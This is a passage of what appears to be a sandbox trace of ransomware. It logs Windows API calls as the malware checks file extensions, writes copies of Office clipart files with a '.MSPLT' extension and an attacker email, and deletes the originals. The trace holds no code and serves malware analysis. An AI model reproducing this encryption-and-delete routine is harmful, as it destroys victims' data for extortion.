(lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00152_.WMF") returned 68 [0299.421] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00152_.WMF") returned 68 [0299.421] lstrlenW (lpString=".doc") returned 4 [0299.421] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0299.421] lstrlenW (lpString=".docx") returned 5 [0299.421] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0299.421] lstrlenW (lpString=".pdf") returned 4 [0299.421] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0299.421] lstrlenW (lpString=".xls") returned 4 [0299.421] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0299.421] lstrlenW (lpString=".xlsx") returned 5 [0299.421] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0299.421] lstrlenW (lpString=".ppt") returned 4 [0299.421] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0299.422] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00152_.WMF") returned 68 [0299.422] lstrlenW (lpString=".zip") returned 4 [0299.422] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0299.422] lstrlenW (lpString=".rar") returned 4 [0299.422] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0299.422] lstrlenW (lpString=".bz2") returned 4 [0299.422] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0299.422] lstrlenW (lpString=".7z") returned 3 [0299.422] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0299.422] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00152_.WMF") returned 68 [0299.422] lstrlenW (lpString=".dbf") returned 4 [0299.422] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0299.422] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00152_.WMF") returned 68 [0299.422] lstrlenW (lpString=".1cd") returned 4 [0299.422] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0299.422] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00152_.WMF") returned 68 [0299.422] lstrlenW (lpString=".jpg") returned 4 [0299.422] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0299.422] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00152_.WMF") returned 68 [0299.422] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00152_.WMF") returned 68 [0299.422] lstrlenW (lpString=".doc") returned 4 [0299.422] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0299.422] lstrlenW (lpString=".docx") returned 5 [0299.422] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0299.422] lstrlenW (lpString=".pdf") returned 4 [0299.422] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0299.422] lstrlenW (lpString=".xls") returned 4 [0299.422] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0299.423] lstrlenW (lpString=".xlsx") returned 5 [0299.423] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0299.423] lstrlenW (lpString=".ppt") returned 4 [0299.423] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0299.423] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00152_.WMF") returned 68 [0299.423] lstrlenW (lpString=".zip") returned 4 [0299.423] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0299.423] lstrlenW (lpString=".rar") returned 4 [0299.423] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0299.423] lstrlenW (lpString=".bz2") returned 4 [0299.423] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0299.423] lstrlenW (lpString=".7z") returned 3 [0299.423] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0299.423] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00152_.WMF") returned 68 [0299.423] lstrlenW (lpString=".dbf") returned 4 [0299.423] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0299.423] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00152_.WMF") returned 68 [0299.423] lstrlenW (lpString=".1cd") returned 4 [0299.423] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0299.423] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00152_.WMF") returned 68 [0299.423] lstrlenW (lpString=".jpg") returned 4 [0299.423] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0299.423] lstrcmpiW (lpString1=".WMF", lpString2=".MSPLT") returned 1 [0299.423] lstrlenW (lpString="BL00194_.WMF") returned 12 [0299.424] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00194_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00194_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c0 [0299.424] GetFileSizeEx (in: hFile=0x4c0, lpFileSize=0x2acff14 | out: lpFileSize=0x2acff14*=3986) returned 1 [0299.424] CloseHandle (hObject=0x4c0) returned 1 [0299.424] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00194_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00194_.wmf")) returned 0x220 [0299.424] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00194_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00194_.wmf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0299.425] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00194_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00194_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c0 [0299.425] SetFilePointerEx (in: hFile=0x4c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2acfec0 | out: lpNewFilePointer=0x0) returned 1 [0299.425] SetFilePointerEx (in: hFile=0x4c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2acfec0 | out: lpNewFilePointer=0x0) returned 1 [0299.425] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00194_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00194_.wmf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x464 [0299.426] GetLastError () returned 0x0 [0299.426] ReadFile (in: hFile=0x4c0, lpBuffer=0x3a8b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2acfecc, lpOverlapped=0x0 | out: lpBuffer=0x3a8b020*, lpNumberOfBytesRead=0x2acfecc*=0xf92, lpOverlapped=0x0) returned 1 [0299.435] WriteFile (in: hFile=0x464, lpBuffer=0x3a8b020*, nNumberOfBytesToWrite=0xfa0, lpNumberOfBytesWritten=0x2acfc94, lpOverlapped=0x0 | out: lpBuffer=0x3a8b020*, lpNumberOfBytesWritten=0x2acfc94*=0xfa0, lpOverlapped=0x0) returned 1 [0299.436] ReadFile (in: hFile=0x4c0, lpBuffer=0x3a8b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2acfecc, lpOverlapped=0x0 | out: lpBuffer=0x3a8b020*, lpNumberOfBytesRead=0x2acfecc*=0x0, lpOverlapped=0x0) returned 1 [0299.436] WriteFile (in: hFile=0x464, lpBuffer=0x3a8b020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2acfc94, lpOverlapped=0x0 | out: lpBuffer=0x3a8b020*, lpNumberOfBytesWritten=0x2acfc94*=0xec, lpOverlapped=0x0) returned 1 [0299.436] SetEndOfFile (hFile=0x464) returned 1 [0299.437] CloseHandle (hObject=0x464) returned 1 [0299.438] SetFilePointerEx (in: hFile=0x4c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2acfec0 | out: lpNewFilePointer=0x0) returned 1 [0299.438] SetEndOfFile (hFile=0x4c0) returned 1 [0299.450] CloseHandle (hObject=0x4c0) returned 1 [0299.450] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00194_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0299.450] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00194_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00194_.wmf")) returned 1 [0299.451] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00194_.WMF") returned 68 [0299.451] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00194_.WMF") returned 68 [0299.451] lstrlenW (lpString=".doc") returned 4 [0299.451] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0299.451] lstrlenW (lpString=".docx") returned 5 [0299.451] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0299.451] lstrlenW (lpString=".pdf") returned 4 [0299.451] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0299.451] lstrlenW (lpString=".xls") returned 4 [0299.451] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0299.451] lstrlenW (lpString=".xlsx") returned 5 [0299.451] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0299.451] lstrlenW (lpString=".ppt") returned 4 [0299.451] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0299.451] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00194_.WMF") returned 68 [0299.451] lstrlenW (lpString=".zip") returned 4 [0299.452] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0299.452] lstrlenW (lpString=".rar") returned 4 [0299.452] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0299.452] lstrlenW (lpString=".bz2") returned 4 [0299.452] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0299.452] lstrlenW (lpString=".7z") returned 3 [0299.452] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0299.452] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00194_.WMF") returned 68 [0299.452] lstrlenW (lpString=".dbf") returned 4 [0299.452] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0299.452] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00194_.WMF") returned 68 [0299.452] lstrlenW (lpString=".1cd") returned 4 [0299.452] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0299.452] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00194_.WMF") returned 68 [0299.452] lstrlenW (lpString=".jpg") returned 4 [0299.452] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0299.452] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00194_.WMF") returned 68 [0299.452] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00194_.WMF") returned 68 [0299.452] lstrlenW (lpString=".doc") returned 4 [0299.452] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0299.452] lstrlenW (lpString=".docx") returned 5 [0299.452] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0299.452] lstrlenW (lpString=".pdf") returned 4 [0299.452] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0299.452] lstrlenW (lpString=".xls") returned 4 [0299.452] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0299.452] lstrlenW (lpString=".xlsx") returned 5 [0299.452] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0299.452] lstrlenW (lpString=".ppt") returned 4 [0299.452] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0299.452] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00194_.WMF") returned 68 [0299.452] lstrlenW (lpString=".zip") returned 4 [0299.452] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0299.453] lstrlenW (lpString=".rar") returned 4 [0299.453] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0299.453] lstrlenW (lpString=".bz2") returned 4 [0299.453] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0299.453] lstrlenW (lpString=".7z") returned 3 [0299.453] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0299.453] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00194_.WMF") returned 68 [0299.453] lstrlenW (lpString=".dbf") returned 4 [0299.453] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0299.453] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00194_.WMF") returned 68 [0299.453] lstrlenW (lpString=".1cd") returned 4 [0299.453] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0299.453] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00194_.WMF") returned 68 [0299.453] lstrlenW (lpString=".jpg") returned 4 [0299.453] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0299.453] lstrcmpiW (lpString1=".WMF", lpString2=".MSPLT") returned 1 [0299.453] lstrlenW (lpString="BL00195_.WMF") returned 12 [0299.453] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00195_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00195_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x480 [0299.690] GetFileSizeEx (in: hFile=0x480, lpFileSize=0x2acff14 | out: lpFileSize=0x2acff14*=8070) returned 1 [0299.690] CloseHandle (hObject=0x480) returned 1 [0299.690] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00195_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00195_.wmf")) returned 0x220 [0299.690] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00195_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00195_.wmf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0299.690] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00195_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00195_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x480 [0299.691] SetFilePointerEx (in: hFile=0x480, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2acfec0 | out: lpNewFilePointer=0x0) returned 1 [0299.691] SetFilePointerEx (in: hFile=0x480, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2acfec0 | out: lpNewFilePointer=0x0) returned 1 [0299.691] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00195_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00195_.wmf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x44c [0299.716] GetLastError () returned 0x0 [0299.717] ReadFile (in: hFile=0x480, lpBuffer=0x3a8b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2acfecc, lpOverlapped=0x0 | out: lpBuffer=0x3a8b020*, lpNumberOfBytesRead=0x2acfecc*=0x1f86, lpOverlapped=0x0) returned 1 [0299.725] WriteFile (in: hFile=0x44c, lpBuffer=0x3a8b020*, nNumberOfBytesToWrite=0x1f90, lpNumberOfBytesWritten=0x2acfc94, lpOverlapped=0x0 | out: lpBuffer=0x3a8b020*, lpNumberOfBytesWritten=0x2acfc94*=0x1f90, lpOverlapped=0x0) returned 1 [0299.727] ReadFile (in: hFile=0x480, lpBuffer=0x3a8b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2acfecc, lpOverlapped=0x0 | out: lpBuffer=0x3a8b020*, lpNumberOfBytesRead=0x2acfecc*=0x0, lpOverlapped=0x0) returned 1 [0299.727] WriteFile (in: hFile=0x44c, lpBuffer=0x3a8b020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2acfc94, lpOverlapped=0x0 | out: lpBuffer=0x3a8b020*, lpNumberOfBytesWritten=0x2acfc94*=0xec, lpOverlapped=0x0) returned 1 [0299.727] SetEndOfFile (hFile=0x44c) returned 1 [0299.728] CloseHandle (hObject=0x44c) returned 1 [0299.729] SetFilePointerEx (in: hFile=0x480, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2acfec0 | out: lpNewFilePointer=0x0) returned 1 [0299.730] SetEndOfFile (hFile=0x480) returned 1 [0299.733] CloseHandle (hObject=0x480) returned 1 [0299.734] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00195_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0299.735] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00195_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00195_.wmf")) returned 1 [0299.735] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00195_.WMF") returned 68 [0299.735] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00195_.WMF") returned 68 [0299.735] lstrlenW (lpString=".doc") returned 4 [0299.735] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0299.736] lstrlenW (lpString=".docx") returned 5 [0299.736] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0299.736] lstrlenW (lpString=".pdf") returned 4 [0299.736] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0299.736] lstrlenW (lpString=".xls") returned 4 [0299.736] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0299.736] lstrlenW (lpString=".xlsx") returned 5 [0299.736] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0299.736] lstrlenW (lpString=".ppt") returned 4 [0299.736] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0299.736] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00195_.WMF") returned 68 [0299.736] lstrlenW (lpString=".zip") returned 4 [0299.736] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0299.736] lstrlenW (lpString=".rar") returned 4 [0299.736] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0299.736] lstrlenW (lpString=".bz2") returned 4 [0299.736] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0299.736] lstrlenW (lpString=".7z") returned 3 [0299.736] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0299.736] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00195_.WMF") returned 68 [0299.736] lstrlenW (lpString=".dbf") returned 4 [0299.736] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0299.736] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00195_.WMF") returned 68 [0299.736] lstrlenW (lpString=".1cd") returned 4 [0299.736] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0299.736] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00195_.WMF") returned 68 [0299.736] lstrlenW (lpString=".jpg") returned 4 [0299.736] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0299.737] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00195_.WMF") returned 68 [0299.737] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00195_.WMF") returned 68 [0299.737] lstrlenW (lpString=".doc") returned 4 [0299.737] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0299.737] lstrlenW (lpString=".docx") returned 5 [0299.737] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0299.737] lstrlenW (lpString=".pdf") returned 4 [0299.737] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0299.737] lstrlenW (lpString=".xls") returned 4 [0299.737] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0299.737] lstrlenW (lpString=".xlsx") returned 5 [0299.737] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0299.737] lstrlenW (lpString=".ppt") returned 4 [0299.737] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0299.737] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00195_.WMF") returned 68 [0299.737] lstrlenW (lpString=".zip") returned 4 [0299.737] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0299.737] lstrlenW (lpString=".rar") returned 4 [0299.737] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0299.737] lstrlenW (lpString=".bz2") returned 4 [0299.737] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0299.737] lstrlenW (lpString=".7z") returned 3 [0299.737] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0299.737] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00195_.WMF") returned 68 [0299.737] lstrlenW (lpString=".dbf") returned 4 [0299.738] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0299.738] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00195_.WMF") returned 68 [0299.738] lstrlenW (lpString=".1cd") returned 4 [0299.738] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0299.738] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00195_.WMF") returned 68 [0299.738] lstrlenW (lpString=".jpg") returned 4 [0299.738] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0299.738] lstrcmpiW (lpString1=".WMF", lpString2=".MSPLT") returned 1 [0299.738] lstrlenW (lpString="BL00248_.WMF") returned 12 [0299.738] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00248_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00248_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x480 [0299.739] GetFileSizeEx (in: hFile=0x480, lpFileSize=0x2acff14 | out: lpFileSize=0x2acff14*=1536) returned 1 [0299.739] CloseHandle (hObject=0x480) returned 1 [0299.739] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00248_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00248_.wmf")) returned 0x220 [0299.740] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00248_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00248_.wmf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0299.740] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00248_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00248_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x480 [0299.740] SetFilePointerEx (in: hFile=0x480, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2acfec0 | out: lpNewFilePointer=0x0) returned 1 [0299.740] SetFilePointerEx (in: hFile=0x480, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2acfec0 | out: lpNewFilePointer=0x0) returned 1 [0299.740] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00248_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00248_.wmf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x44c [0299.741] GetLastError () returned 0x0 [0299.741] ReadFile (in: hFile=0x480, lpBuffer=0x3a8b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2acfecc, lpOverlapped=0x0 | out: lpBuffer=0x3a8b020*, lpNumberOfBytesRead=0x2acfecc*=0x600, lpOverlapped=0x0) returned 1 [0299.743] WriteFile (in: hFile=0x44c, lpBuffer=0x3a8b020*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x2acfc94, lpOverlapped=0x0 | out: lpBuffer=0x3a8b020*, lpNumberOfBytesWritten=0x2acfc94*=0x610, lpOverlapped=0x0) returned 1 [0299.745] ReadFile (in: hFile=0x480, lpBuffer=0x3a8b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2acfecc, lpOverlapped=0x0 | out: lpBuffer=0x3a8b020*, lpNumberOfBytesRead=0x2acfecc*=0x0, lpOverlapped=0x0) returned 1 [0299.745] WriteFile (in: hFile=0x44c, lpBuffer=0x3a8b020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2acfc94, lpOverlapped=0x0 | out: lpBuffer=0x3a8b020*, lpNumberOfBytesWritten=0x2acfc94*=0xec, lpOverlapped=0x0) returned 1 [0299.745] SetEndOfFile (hFile=0x44c) returned 1 [0299.745] CloseHandle (hObject=0x44c) returned 1 [0299.748] SetFilePointerEx (in: hFile=0x480, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2acfec0 | out: lpNewFilePointer=0x0) returned 1 [0299.748] SetEndOfFile (hFile=0x480) returned 1 [0299.752] CloseHandle (hObject=0x480) returned 1 [0299.752] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00248_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0299.753] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00248_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00248_.wmf")) returned 1 [0299.754] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00248_.WMF") returned 68 [0299.754] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00248_.WMF") returned 68 [0299.754] lstrlenW (lpString=".doc") returned 4 [0299.754] lstrcmpiW (lpString1=".doc", 